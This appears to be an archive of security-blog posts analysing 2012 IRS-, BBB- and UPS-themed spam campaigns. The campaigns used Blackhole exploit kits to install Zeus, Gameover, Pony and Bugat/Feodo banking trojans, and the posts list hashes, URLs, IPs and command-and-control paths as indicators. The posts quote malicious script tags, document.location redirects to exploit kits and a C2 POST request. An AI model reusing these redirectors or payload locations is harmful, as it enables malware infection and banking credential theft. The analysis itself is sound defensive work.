Tag Archives: IRS

Zeus v2.0.8.9 being rolled out on IRS themed spam

We analyzed following malicious attachement which was distributed with IRS themed spam May 14 2012:

Name: Plexer_Order-z9284
MD5: e807511362923762da627599daeeba65
Size: 21,54,749 bytes
Content: Plexer_Order-z9284.exe

This zip archive contained the following malicious dropper:

Name: Plexer_Order-z9284.exe
MD5: 3c8b1a1c45fbb93e93dbde75795c21bd
Size: 21,84,348 bytes
Timestamp: 1970:01:01 01:00:49+01:00
Company Name: NEW ORDER 2012 FOR VIEW PLEXR
File Description: Win32 Cabinet Self-Extractor
File Version: 9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
Internal Name: Wextract
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: WEXTRACT.EXE .MUI
Product Name: Plexer Order Viewer 2012
Product Version: 56.0.89.3
Comments: NEW VERSION ORDER 2012 FOR VIEW PLEXR
Website: http://www.avira.com
Packager: Xenocode Postbuild 2009 for .NET Beta
Packager Version: 7.0.162

This dropper first installs Google Talk on the system and brings Google Talk window on top of desktop. Behind the scene, it installs Zeus v2.0.8.9. Zeus was intalled in %APPDATA%/[random]/emta.exe and had following file properties:

Name: emta.exe
MD5: bbdeabff13e565e187e0e85fcb1e732f
Size: 95,744 bytes
Tmestamp: 2011:07:27 04:06:30+02:00

Like normal Zeus, it first downloads configuration file consisting of targetlist and webinjects from:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/config.bin

Zeus dropzone was also running on same domain at:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/gate.php

This Zeus controller was running on a compromised website of KMG INSIGHTS who offers a complete line of marketing, technology and organizational consulting services.

Russian, Spanish, Italian and UK banks and financial institutions were on the target of this Zeus controller.

IRS spams

We analyzed following malicious URLs which we believe are used in IRS spams:

hxxp://9×18.com/1FrYnHUV/index.html
hxxp://9×18.com/6GkXis2t/index.html
hxxp://9×18.com/7zSj5u8N/index.html
hxxp://9×18.com/9sfGpVaP/index.html
hxxp://9×18.com/DcXTY95c/index.html
hxxp://9×18.com/EdVTFHRy/index.html
hxxp://9×18.com/H37jjL6S/index.html
hxxp://9×18.com/JLdSGm4e/index.html
hxxp://9×18.com/KirxGAkT/index.html
hxxp://9×18.com/M7vrQsUT/index.html
hxxp://9×18.com/N7kkDdho/index.html
hxxp://9×18.com/U8nC5QAL/index.html
hxxp://9×18.com/Y1aFsgBk/index.html
hxxp://9×18.com/bFdJryZB/index.html
hxxp://9×18.com/igc6smeH/index.html
hxxp://9×18.com/jUyLton1/index.html
hxxp://9×18.com/pHbH0hzY/index.html
hxxp://9×18.com/rPWsV1Cp/index.html
hxxp://9×18.com/tjUQVqbC/index.html
hxxp://beinsync.in/1FrYnHUV/index.html
hxxp://9×18.com/wVKshGdP/index.html
hxxp://beinsync.in/6GkXis2t/index.html
hxxp://alcopaz.com/1FrYnHUV/index.html
hxxp://beinsync.in/7zSj5u8N/index.html
hxxp://alcopaz.com/6GkXis2t/index.html
hxxp://beinsync.in/9sfGpVaP/index.html

Although 9×18.com was restricting these URL access, other malicious URLs were up and serving the purpose redirecting victim to Blackhole exploit kit through following 3 javascripts:

<script type=”text/javascript” src=”hxxp://anydemo.in/ox8rWBHG/js.js”></script>
<script type=”text/javascript” src=”hxxp://Darsshan.com/8n9SXXoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://www.moverpackermart.com/3F634op7/js.js”></script>

Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first drops Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Enze\izvuo.exe

MD5: 4105a615d658d89e836c125844be5f39
Size: 3,41,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of “MF222a20″ and cid of “5555″.

As we have been nothing here, Pony Downloader and Gameover Zeus both payloads share same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

IRS-Intuit-BBB themed spams -to- BlackHole -to- Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://pedrasecompanhia.com.br/KdiK8scE/index.html

IRS notification of your tax appeal status

Subject: Rejection of your tax appeal.
URL: hxxp://entertain4you.com/iWYE2wes/index.html

Rejection of your tax appeal

Subject: Your tax return appeal is declined
URLs: hxxp://pedrasecompanhia.com.br/iWYE2wes/index.html

Your tax return appeal is declined

Subject: Your Intuit.com software order.
URLs: hxxp://panacea-retail.com/N192yy6H/index.html
hxxp://mondistar.ro/fUjtMi6v/index.html
hxxp://panacea-retail.com/N192yy6H/index.html

Your Intuit.com software order

Subject: Your intuit.com order.
URLs: hxxp://pinter.rsia-andini.com/KdiK8scE/index.html
hxxp://pinter.rsia-andini.com/Q8dvz6Dw/index.html
hxxp://mainfar.zxq.net/fUjtMi6v/index.html

Your intuit.com order

Subject: Re: your customers complaint ID 50606977.
URLs: hxxp://almeidadohrn.com/wp-includes/opek.html

Re: your customers complaint ID 50606977

Subject: Your company Better Business Bureau complaint.
URLs: hxxp://thearabmatch.com/8ViaUCMr/index.html
hxxp://mirsatmurutoglu.freehosting.com/TcS203Fn/index.html
http://mondistar.ro/N192yy6H/index.html

Your company Better Business Bureau complaint

Your company Better Business Bureau complaint

Subject: BBB processing RE: Case ID 33614330
URLs: hxxp://michael-ngo.com/wp-includes/opek.html

BBB processing RE: Case ID 33614330

Subject: BBB case ID 35908630
URLs: hxxp://womens-issues.medicalbillingclassesonline.info/wp-includes/opek.html

BBB case ID 35908630

Subject: Your business is accused of illegal activities.
URLs: hxxp://travianx10.host.org/FMG8bqfk/index.html
hxxp://southernmagnetics.com/FMG8bqfk/index.html
hxxp://pedrasecompanhia.com.br/h2gVqD1Q/index.html
hxxp://impresilk.com.br/8ViaUCMr/index.html

Your business is accused of illegal activities.

Your business is accused of illegal activities.

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.102:

document.location=’hxxp://173.224.71.132:8080/showthread.php?t=d44175c6da768b70′;

It downloadeds Gameover Zeus (installer) from the following location:

173.224.71.132:8080 /q.php?f=e0c3a&e=2

File: calc.exe
MD5: 0599eb89a5ca8ea3b7c887e3940d1a33
Size: 2,86,703 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal. It then installs Zeus in %APPDATA% which had following properties:

File: ycegv.exe
MD5: e34904d4dbd79ee5ac9148adc37534cb
Size: 2,73,944 bytes
Other: This file is digitally signed by ‘aPgdobQNbLOM’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:07:23 16:34:06+02:00

This Gameover variant is detected by 7 of 43 AV vendors on VirusTotal.
The Gameover variant had a bot id of “ppcz14″ cid of “3004″ and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

IRS themed spam continue dropping Gameover Zeus

Subject: IRS notification of your tax appeal status.
URL: hxxp://annebickmoreswimming.co[.]uk/SsXbaqXv/index.htmlIRS notification of your tax appeal status
The text ‘Online Tax Appeal’ contains a hyperlink to a URL as shown above.  This page contains no content but only 5 JS:
pancarga[.]com /a5861cqc/js.js
suhutgundem[.]com /VLj9KNR8/js.js
paypal.socialo[.]pl /q9QQjLxa/js.js
personalart[.]pl /93b7jQCc/js.js
m.slevako[.]cz /w4eyfSFP/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.109:

document.location=’hxxp://178.77.99[.]145:8080 /showthread.php?t=d44175c6da768b70 ‘;

It downloadeds Gameover Zeus (installer) from the following location:

178.77.99.145:8080 /q.php?f=e0c3a&e=2

File: info.exe
MD5:c4df59ee070a33e07bbff66c0d46b421
Size: 2,74,383 bytes

This Gameover variant is detected by 3 of 43 AV vendors on VirusTotal.com. It then installs Zeus in %APPDATA% which had following properties:

File: eluqf.exe
MD5: cc6d35de55dee429dc801535b8104caa
Size: 2,73,944 bytes
Other: This file is digitally signed by ‘aPgdobQNbLOM’
Company Name: qwetr Corporation
File Description: qwetr Magnifier
File Version: 5.00.2151.1
Internal Name: MAGNIFIER
Legal Copyright: Copyright (C) qwetr Corp. 1981-1999
Original Filename: MAGNIFY.EXE
Product Name: qwetr(R) Windows (R) 2000 Operating System
Timestamp: 2011:02:03 19:50:12+01:00

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com.
The Gameover variant had a bot id of “ppcz13″ cid of “3004” and posted online banking credentials stolen from victims to a drop zone at 87.97.164.223 over port 22005.

IRS – Your tax appeal is rejected.

Subject: Your tax appeak is rejected.
URL: hxxp://morningdeals[.]net/ZseUkSLa/index.html

Your tax appeal is rejected.

The text ‘Online Tax Appeal’ contains a hyperlink to a URL as shown above. This page contains no content but only 4 JS:

badigames[.]net /YRQnqzee/js.js
hermandaddepasion[.]com /63x21NoX/js.js
http://www.techhome.rmutk.ac[.]th /8vVWAm9s/js.js
http://www.trakter4u[.]gr /dLYd6p1U/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 207.210.65.109:

document.location=’hxxp://tradercircuit[.]com/showthread.php?t=73a07bcb51f4be71′;

It first downloaded Pony downloader from the following location:

tradercircuit[.]com /q.php?f=e4a98&e=2

File: info.exe
MD5:623d391863770fd11a51f564a655cfc0
Size: 95,392 bytes

This pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

layout.cnt[.]br /3ZD7ArbR/rnzj80FK.exe —> hosted at IP address 187.45.216.36
kucukagaanaokulu.k12[.]tr /5hxYiCGM/DLsp9.exe —> hosted at IP address 94.102.1.94
beyondcreativehm[.]com /MnFUS9Ah/PVzKLHf.exe —> hosted at IP address 69.89.31.99

All of these files were same with following properties:

File: rnzj80FK.exe/DLsp9.exe/PVzKLHf.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 2,78,528 bytes
Other: This file is digitally signed by ‘66666666’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal.com. The Gameover Zeus variant posts to a dropzone at 78.229.28.1 over port 28598. It had CID of “3004”.

Triple Barrel Spam Cannon

wall of spam

Our spammer friends started their week with an early morning spam run. We observed three different spam campaigns in action today that all utilized the same infrastructure and dropped the same Bugat/Feodo banking trojan.

The bad guys used the same modus operandi that theyve come to rely on. Their spam messages contained link to hacked websites – primarily WordPress blogs. These hacked sites hosted malicious javascript that redirected victims to an Exploit Kit that dropped a Bugat/Feodo payload.

The different campaigns were easily identifiable via the URL paths used on the hacked websites.

  • IRS-themed spam had a URL path of /fgallery/rep.html or just /rep.html. Checkout a Wepawet report from an IRS-spam sample here.
  • AICPA-themed spam had a URL path of /fgallery/astro.html or just /astro.html. Checkout a Wepawet report from an AICPA-spam sample here.
  • BBB-themed spam had a URL path of /fgallery/brena.html or just /brena.html. Checkout a Wepawet report from a BBB-spam sample here.

All of the observed samples redirected victims to an exploit kit at hxxp://110hobart[.]com.

The 110hobart[.]com currently resolves to 76.12.101.172. While this domain only points to 1 IP address, the A record has a TTL of 900 seconds – indicating that it is hosted on a fast-flux infrastructure. This is consistent with the other exploits kits used in associated spam campaigns. Further investigation of the 110hobart[.]com domain shows that its has 4 NS records including:

  • ns1.hiring-decisions.com
  • ns2.hiring-decisions.com
  • ns1.grapecomputers.net
  • ns2.grapecomputers.net

Our guess is that these nameservers are serving other malicious domains. We can use the “swiss army knife” over at Robtex to validate our assumption. Indeed, Robtex proves our intuition correct and shows that following other domains also utilized these nameservers:

  • energirans[.]net
  • hapturing[.]net
  • housespect[.]net
  • synergyledlighting[.]net
  • synetworks[.]net
Have we seen any of these domains before? We sure have! The domain energirans.net hosted an exploit kit used in a previous AICPA spam run documented here. Jsunpack tells us that hapturing[.]net is also bad. Conrad over at Dynamoo’s Blog notes that housespect[.]net and synetworks[.]net are bad as well. And yes, you guessed it synergyledlighting[.]net also stinks … Wepawet tell us more here.

In the case of the IRS, AICPA, and BBB spam runs seen today all of them ultimately instructed victims to download a Bugat/Feodo banking trojan from hxxp://110hobart[.]com/w.php?f=cc677&e=1. This payload had an MD5 of 2dbe5c4303672f256886ed27c92e97be and was detected by 9 of 43 AV vendors on VirusTotal.

This Bugat/Feodo sample retrieved a configuration file/target list from a command and control server at hjpyvexsutdctjol[.]ru:8080 via the following POST request:
POST /rwx/B2_9w3/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: hjpyvexsutdctjol[.]ru:8080
Content-Length: 97
Connection: Keep-Alive
Cache-Control: no-cache
We havent yet examined the configuration file/target list in detail but were confident that it targets the same 300+ financial institutions that weve seen in previous Bugat/Feodo configs.

United Postal Service Tracking Number H7614058739

Most of the spam cannons that we follow go quiet on the weekends, so lets take a look at a sample that we picked up on Friday 2012-02-24. This spam spoofed communications from UPS.

We noted that at least one spam sample from this UPS campaign was sent from a bot at 171.229.226.63. This particular IP is apart of a known Grum spambot.

Attached to this sample was an file named “UPS-NR954wi27683.htm”. This html file contained a malicious javascript that redirected victims to a Blackhole Exploit kit cgoosjjdopola[.]ru. This kit probed victims for a series of potential vulnerabilities downloading malicious .swf, .pdf, and .jar files.

Vulnerable computers were then instructed to download a Bugat/Feodo banking trojan from sumgankorobanns[.]ru via a GET request to sumgankorobanns[.]ru:8080/images/jw.php?i=10. The downloaded Bugat/Feodo payload had the following properties:

File: gsxohsapcpklkti.exe
Size: 73216
MD5: c6d7b68ee00085702f7f6aafb03ca559

Both cgoosjjdopola[.]ru and sumgankorobanns[.]ru were hosted on the same fast-flux botnet we observed in our previous post “Rejection of your tax appeal“. These domains resolved to the following IP addresses (a number of which were observed in our previous post):

83.170.91.152
85.214.204.32
94.20.30.91
124.124.212.172
46.137.85.218
61.187.191.16
184.106.151.78
208.109.171.99
211.44.250.173
173.203.211.157
174.122.121.154

We had a little time on our hands today so we decided to poke around the Blackhole Kit  at sumgankorobanns[.]ru and see if it hosted any other goodies. We found that this kit hosted the same Bugat/Feodo payload (c6d7b68ee00085702f7f6aafb03ca559) between jw.php?i=1 and jw.php?i=18.

This Bugat/Feodo variant attempts to first to connect to a command and control server at hjpyvexsutdctjol[.]ru. During testing this control server returned a “500 Internal Server Error”. The variant then connects to a secondary control server at wfyusepaxvulfdtn[.]ru via the following POST request wfyusepaxvulfdtn[.]ru:8080/rwx/B1_3n9/in/. This POST request returned a configuration file. The configuration file instructed the Bugat/Feodo variant to hijack account credentials for approximately 300 banking websites.

If the /rwx/B1_3n9/in/ path looks familiar to you it should. Recall our previous post “Rejection of your tax appeal” where we saw a different Bugat/Feodo variant pull down its configuration file from hjpyvexsutdctjol[.]ru:8080/rwx/B2_9w3/in/.

Hrm, the Bugat/Feodo variant dropped by the UPS spam also tried to connect to the control server at hjpyvexsutdctjol[.]ru. However, the UPS Bugat/Feodo variant was configured to download its configuration file from /rwx/B1_3n9/in/ instead of /rwx/B2_9w3/in/. Perhaps, the /B1 and /B2 path variations are used by the bad guys to track different spam and malware distribution campaigns.

The current control server at wfyusepaxvulfdtn[.]ru also dropped an additional bit of love. Appended to the configuration file downloaded from wfyusepaxvulfdtn[.]ru:8080/rwx/B1_3n9/in/ was a secondary malware payload identified as Heap. This Heap variant had the following properties:

File: POS1B.tmp
Size: 118272
MD5: 64BE90378FC40117EA93DFB8FA5AEC92

This Heap variant scans the victim machine for email addresses. These email addresses are harvested and then sent to a control server 46.137.122.154 over port 20050. Communications from the Heap variant to the control server at 46.137.122.154 were encoded with a standard base64 alphabet.

If you wanna know if youre infected by Bugat/Feodo you can do the following simple checks on your local machine. First, Bugat/Feodo is almost always installed in the following location on your filesystem: C:\Documents and Settings\Administrator\Application Data\. Bugat/Feodo is installed as KB********.exe where ******** is a series of 8 random number unique to each victim computer. Additionally, the downloaded configuration file is stored in the clear in the victim’s registry at HKEY_CURRENT_USER\Software\Microsoft\Windows Media Center\********. If you find either of these artifacts on your machine youre probably infected.

What can brown do for you, you ask? Well, in this case it can infect you with a Bugat/Feodo banking trojan and a Heap email harvester.

Warning from IRS

We’re going to file the following example under “even spammers make mistakes”.

The above spam message spoofing communications from the IRS was received yesterday on 2012-02-23. It was sent from a bot with the IP 62.129.255.5.

The otherwise well crafted spam had one crucial mistake. It contained a link to hxxp://dll-aghazeh[.]com/YzrYt31J/index.html. Unfortunately for the bad guys this page returned a ‘404 Page Not Found’ error instead of the expected malicious javascript.

While its unclear why this page did not contain any malicious code, we can safely assume that it was supposed to contain javascript redirectors that would have pointed victims to a Blackhole Exploit kit. That Exploit kit would have almost certainly dropped a Pony downloader on its victims.

How can we make this assumption? Well, its simple. Note the structure of the above malicious link – hxxp://dll-aghazeh[.]com/YzrYt31J/index.html. Notice the random 8 random digit character folder name in the URL path? Weve seen that pattern before. A quick review of the previous posts Better Business Bureau complaint and Notification of securities investigation against your company reveal that this 8 random digit pattern was used in previous spam campaigns that also dropped a Pony downloader variant. So, this random file name pattern appears to be an indicator for malicious behavior.

As you’re trolling through your inbox and you see suspicious looking emails with text goading you to click on a link, place your mouse over this link and study the destination url without clicking on the link. If you see this 8 random digit pattern its a good idea to delete the email and carry on your day.

Rejection of your tax appeal

In today’s episode we’ll take a closer look at an IRS-themed spam sample seen floating around the internets on 2011-02-23.

This sample had a link to hxxp://knlu[.]info/wp-content/uploads/fgallery/ir.html. A number of other IRS-themed samples aslo contained links to what appear to be hacked wordpress blogs. These blogs all contained “/fgallery/ir.html” in the URI path.

With a little bit of google-fu we can uncover other hacked wordpress via a simple “inurl:/fgallery/ir.html” search.

The page pulled from the received spam sample, hxxp://knlu[.]info/wp-content/uploads/fgallery/ir.html, contains malicious javascript that redirects victims to hxxp://energirans[.]net/main.php?page=710730c6e154dae7 – a Blackhole exploit kit.

Vulnerable victims then download a malicios binary from energirans[.]net/w.php?f=3dc5c&e=4. This binary has been identified as a Bugat/Feodo banking trojan and has the following properties:

File: about.exe
Size: 63488
MD5: 85DC077D5E50B7E133FEF85E09DFE2FB

Unfortunately, this Bugat/Feodo variant that is only detected by 2/43 AV vendors on VirusTotal.

A closer look at energirans[.]net reveals that it is hosted on a fast-flux infrastructure. Via centralops we can see that the energirans[.]net domains resolves to only one IP at 115.249.190.46. However, the A record for energirans[.]net has a TTL (time to live) of 15 minutes. This indicates that the DNS mapping for the energirans[.]net will only stay cached for 15 minutes. A TTL this short is a strong indicator that the domain in question is hosted on a fast-flux infrastructure. Spamhaus has a good explanation of fast-flux here.

The dropped Bugat/Feodo variant implants itself on the victim machine and then connects to a command and control server at hjpyvexsutdctjol[.]ru where it downloads a configuration file from hjpyvexsutdctjol[.]ru:8080/rwx/B2_9w3/in/. This configuration file instructs the installed Bugat/Feodo variant to hijack account credentials from the listed banking websites. A quick look through this configuration file shows that it targets approximately 300 websites.

The hjpyvexsutdctjol[.]ru is also hosted on a fast-flux infrastructure that utilizes at least the following IPs:

83.170.91.152
85.214.204.32
94.20.30.91
96.125.168.172
98.103.133.13
124.124.212.172
46.137.85.218
50.76.184.100
61.187.191.16
173.203.211.157
174.122.121.154
184.106.151.78
208.109.171.99
211.44.250.173

The fast-flux infrastructure hosting hjpyvexsutdctjol[.]ru appears to be different than the above infrastructure hosting the Blackhole exploit kit at energirans[.]net. Note the TTL for hjpyvexsutdctjol[.]ru is 60 seconds – much shorter than the 900 seconds for the energirans[.]net domain.